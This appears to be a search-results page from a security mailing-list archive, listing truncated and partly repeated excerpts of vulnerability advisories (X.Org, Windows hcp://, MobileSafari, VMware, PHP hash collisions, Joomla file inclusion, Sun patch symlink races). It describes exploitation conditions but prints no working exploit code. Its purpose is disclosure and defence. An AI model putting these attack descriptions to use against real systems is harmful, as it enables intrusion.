Next Page >>
typically
[at] layerone [dot] info no later than March 15, 2008. You will
receive notice no later than April 1, 2008 to let you know if your
talk has been accepted.
As we have a single presentation track, please bear in mind that
speaking slots are limited to one hour. While presenters typically
divide the hour into separate presentation and Q&A sessions, you may
structure your time however you see fit. If you think your
presentation will run longer, or have any special requirements, please
include this information in your submission and we will do our best to
accommodate you.
by another author.
I have not checked other offshoots.
I am writing because I don't think the original full disclosure email
provided sufficient information as to how this could be typically
exploited in a system with typical installations of SQL-Ledger or
offshoots. Indeed, when combined with standard functionality of the
software in typical configurations, the vulnerability is relatively
easy to exploit and does not require external upload access.
PHP 5 uses the DJBX33A (Dan Bernstein's times 33, addition) hash
function and parses POST form data into the $_POST hash table. Because
of the structure of the hash function, it is vulnerable to an equivalent
substring attack.
The maximal POST request size is typically limited to 8 MB, which when
filled with a set of multi-collisions would consume about four hours of
CPU time on an i7 core. Luckily, this time can not be exhausted because
it is limited by the max_input_time (default configuration: -1,
unlimited), Ubuntu and several BSDs: 60 seconds) configuration
parameter. If the max_input_time parameter is set to -1 (theoretically:
Announcing CanSecWest PWN2OWN 2008.
===================================
Three targets, all patched. All in typical client configurations with
typical user configurations. You hack it, you get to keep it.
Each has a file on them and it contains the instructions and how to
claim the prize.
II. DESCRIPTION
Local exploitation of an integer overflow vulnerability in the X.Org X
server, as included in various vendors' operating system distributions,
could allow an attacker to execute arbitrary code with the privileges of
the X server, typically root.
The vulnerability exists within the AllocateGlyph() function, which is
called from several request handlers in the render extension. This
function takes several values from the request, and multiplies them
together to calculate how much memory to allocate for a heap buffer.
II. DESCRIPTION
Local exploitation of an integer overflow vulnerability in the X.Org X
server, as included in various vendors' operating system distributions,
could allow an attacker to execute arbitrary code with the privileges of
the X server, typically root.
The vulnerability occurs when parsing a client request for one of the
following functions:
SProcRenderCreateLinearGradient
----------------------------------------------------------------------------
Help and Support Centre is the default application provided to access online
documentation for Microsoft Windows. Microsoft supports accessing help documents
directly via URLs by installing a protocol handler for the scheme "hcp",
a typical example is provided in the Windows XP Command Line Reference,
available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
Using hcp:// URLs is intended to be safe, as when invoked via the registered
protocol handler the command line parameter /fromhcp is passed to the help
centre application. This flag switches the help centre into a restricted mode,
Remote exploitation of a cross site scripting vulnerability in Apple
Inc.'s MobileSafari could allow an attacker to view sensitive
information in the context of the targeted domain.
This vulnerability occurs in MobileSafari's handling of the
Content-Disposition header, which is typically used to inform the
browser that an attachment is contained in the current response. Typical
browser behavior is to prompt the user with an Open dialog, asking them
how they would like to handle the attachment content (such as opening an
external program). However, MobileSafari does not prompt the user, and
instead opens the attached content in the browser. If an attacker can
II. DESCRIPTION
Local exploitation of multiple memory corruption vulnerabilities in the
X.Org X server, as included in various vendors' operating system
distributions, could allow an attacker to execute arbitrary code with
the privileges of the X server, typically root.
Multiple vulnerabilities are present in the Record and Security
extensions. In both cases, untrusted values are taken from a client
request, and used to swap the byte order of heap memory that follows
the client request. Since the number of bytes to swap is not properly
----------------------------------------------------------------------------
Help and Support Centre is the default application provided to access online
documentation for Microsoft Windows. Microsoft supports accessing help documents
directly via URLs by installing a protocol handler for the scheme "hcp",
a typical example is provided in the Windows XP Command Line Reference,
available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
Using hcp:// URLs is intended to be safe, as when invoked via the registered
protocol handler the command line parameter /fromhcp is passed to the help
centre application. This flag switches the help centre into a restricted mode,
preclusive safety checks. (For more information on SWAPGS and the GS:
segment override in the x64 architecture, see "AMD64 Architecture
Programmer's Manual" Volumes 2 and 3, "24593.pdf" and "24594.pdf".)
The following pseudo-assembly snippet provides a brief illustration of
a typical x64-specific interrupt handler that permits exploitation of
the VMware emulation flaws:
ISR_Entry_Point:
; For a long-mode (64-bit) ISR, RSP points to the following QWORDs:
preclusive safety checks. (For more information on SWAPGS and the GS:
segment override in the x64 architecture, see "AMD64 Architecture
Programmer's Manual" Volumes 2 and 3, "24593.pdf" and "24594.pdf".)
The following pseudo-assembly snippet provides a brief illustration of
a typical x64-specific interrupt handler that permits exploitation of
the VMware emulation flaw:
ISR_Entry_Point:
; For a long-mode (64-bit) ISR, RSP points to the following QWORDs:
Pmcma aims at automating exploitation of invalid memory writes (being
them the consequences of an overflow in a writable section, of a
missing format string, integer overflow, variable misuse, or any
other type of memory corruption).
This is typically usefull in determining if a given bug is a security
vulnerability (if it is exploitable at all, and with which
reliability).
--[ What is it ?
> ----------------------------------------------------------------------------
>
> Help and Support Centre is the default application provided to access online
> documentation for Microsoft Windows. Microsoft supports accessing help documents
> directly via URLs by installing a protocol handler for the scheme "hcp",
> a typical example is provided in the Windows XP Command Line Reference,
> available at http://technet.microsoft.com/en-us/library/bb490918.aspx.
>
> Using hcp:// URLs is intended to be safe, as when invoked via the registered
> protocol handler the command line parameter /fromhcp is passed to the help
> centre application. This flag switches the help centre into a restricted mode,
Announcing CanSecWest PWN2OWN 2008.
===================================
Three targets, all patched. All in typical client configurations with
typical user configurations. You hack it, you get to keep it.
Each has a file on them and it contains the instructions and how to
claim the prize.
Overview:
=========
Level Platforms, Inc. (LPI) flagship product Managed Workplace Service
Center, which provides remote monitoring, reporting and alerting of
device & network status. The software is typically used by Managed
Service Providers and large IT departments. There is also a hosted
version offered through Ingram Micro.
LPI's software has two components, a Service Center (server) component,
and a Onsite Manager (client) component. The Service Center is typically
II. DESCRIPTION
Local exploitation of an invalid array index vulnerability in the X.Org
X server, as included in various vendors' operating system
distributions, could allow an attacker to execute arbitrary code with
the privileges of the X server, typically root.
The vulnerability exists within the XFree86-Misc extension. When
processing a request, a 32-bit value from the client's request is used
as an index into an array of structures. This structure contains an
array of function pointers, one of which is used later in the request
that is executed when other users use the quick reply button shown
for every post.
This point of injection is possible because the topic text is part
of an "onclick" event used for the quick reply function and the
software only escapes characters that are typical for HTML cross
site script attacks. In this case, the single quote character is not
escaped.
I. Description
> FTP and remove additional text (usually at the end of the file, after
> </html>) from all HTML/PHP pages.
Ummmm -- the only part of that likely to be relevant here is the last.
These kinds of web page "compromises" are typically achieved through
bad/ill-configured/non-updated server-side web applications (or their
underlying script engines) and are typically achieved without requiring
any more special or privileged access to the victim sites than the
ability to run a clever Google search or your own brute-force spidering
via a bot-net, etc.
Kerberos application, including the Kerberos administration daemon
(kadmind) or the KDC to crash, and possibly to execute arbitrary code.
Compromise of the KDC or kadmind can compromise the Kerberos key
database and host security on the KDC host. (The KDC and kadmind
typically run as root.) We believe this scenario is highly unlikely,
given the details of the vulnerability.
Third-party applications using MIT krb5 may also be vulnerable.
MITIGATING FACTORS
implement the client's functionality.
The vulnerability occurs in a certain function, which is accessible
through JavaScript. This function is responsible for reading a remote
ICA (Independent Computing Architecture# file from the server.
Typically, the contents of this file are used to provide options
controlling the connection to the application gateway.
During the reading of this file, the vulnerable function fails to check
the return value of the realloc## function. It then adds the number of
bytes read from the file so far to the value returned, and appends file
your vendor.
===[ DESCRIPTION ]======================================================
Typically unprivileged user can not send signal to processes running
with different UID. Due to vulnerability found in the Linux kernel any
local user may bypass security restrictions and send arbitrary signal to
any child process executed by the user.
When a parent process dies or exits its child processes may receive a
III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the current user. In order to exploit this
vulnerability, a user must load a web page containing a specially
crafted TIFF image. An attacker typically accomplishes this via social
engineering or injecting content into compromised, trusted sites.
Typical social engineering attacks will pass URLs as part of instant
messages or electronic mail.
IV. DETECTION
Steve Shockley wrote:
> Stefan Kanthak wrote:
>> 2. The typical user authentication won't help, we're at hardware
>> level here, and no OS needs to be involved.
>
> So, if I understand you correctly, if I boot my machine into DOS the
> memory can be read over Firewire?
If DMA is enabled on the firewire interface its possible!
Issue 1: Weak Enforcement of Authority in HTTP Certificate Headers
------------------------------------------------------------------
Cisco Bug Id - CSCSZ04690
Affects - Cisco CSS
The first weakness affecting the Cisco CSS is that, in a typical client
certificate configuration, HTTP clients may confuse web applications by
injecting their own certificate headers. When utilizing the CSS to
terminate SSL communications, SSL client certificates are first
authenticated by the CSS. From there, the CSS will normally pass the
client's identity to the back-end web server in the form of several HTTP
Introduction:
Remote PHP file inclusion is possible when RG_EMULATION is not defined
in
configuration.php. This is typical when upgrading from an older version,
leaving configuration.php untouched. Furthermore, in PHP,
register_globals
must be 'off', for this exploit to work.
In Joomla >=1.0.13, configuration.php-dist disables register_globals
About:
Easy File Sharing Web Server is an extremely popular web-based file sharing application that has been in use for years.
It is a fast, easy to use commercial, standalone "all-in-one" file-sharing web server.
Customers use a built-in interface to point to files they wish to publish via a menu-driven web application (typically full drives or directories). Files can be shared anonymously, or via EFSWS's built-in user management. EFSWS has built-in SSL encryption to prevent logons from being sent in the clear (as well as all other access). Users log in, and are presented with a menu of files that have been published and that are made available for download.
EFSWS uses the MGH Software "myDB" database plug-in to store db information such as file location, user information (password in the clear), files, forum information, etc. A free db parser is available at:
http://www.mghsoft.com/
Please see vendor site and db engine site for more details.
1/24/2010
With the GUI Sun Update Manager being used to install patches on a system
local users can easily run scripts and create symlinks in an attempt to
clobber files and potentially escalate privileges as this application is
typically run in multi-user mode.
Many patches use insecure file creation in /tmp to store data during
installation. The easiest one to exploit is /tmp/CLEANUP which is used in a
handful of package installation scripts:
script code is typically:
SpiderLabs has documented view state tampering
vulnerabilities in three products from separate vendors.
View states are used by some web application frameworks to
store the state of HTML GUI controls. View states are
typically stored in hidden client-side input fields,
although server-side storage is widely supported.
The affected vendors generally recommend that client-side
view states are cryptographically signed and/or encrypted,
but specific exploits have not been previously documented.
vulnerabilities in the ActiveX objects themselves or use their
functionality to, for example, read arbitrary files from the victim's
file system or even execute arbitrary shell commands in the victim's
workstation.
- - Directly attack vulnerable versions of Internet Explorer in user
workstations. This is a typical client-side attack scenario and could
lead to the remote execution of arbitrary code in the victim's
workstation. In this scenario "one-click" IE bugs (exploitation requires
user assistance) become "zero-click" bugs (exploitation does not require
user interaction).
Next Page>>
|
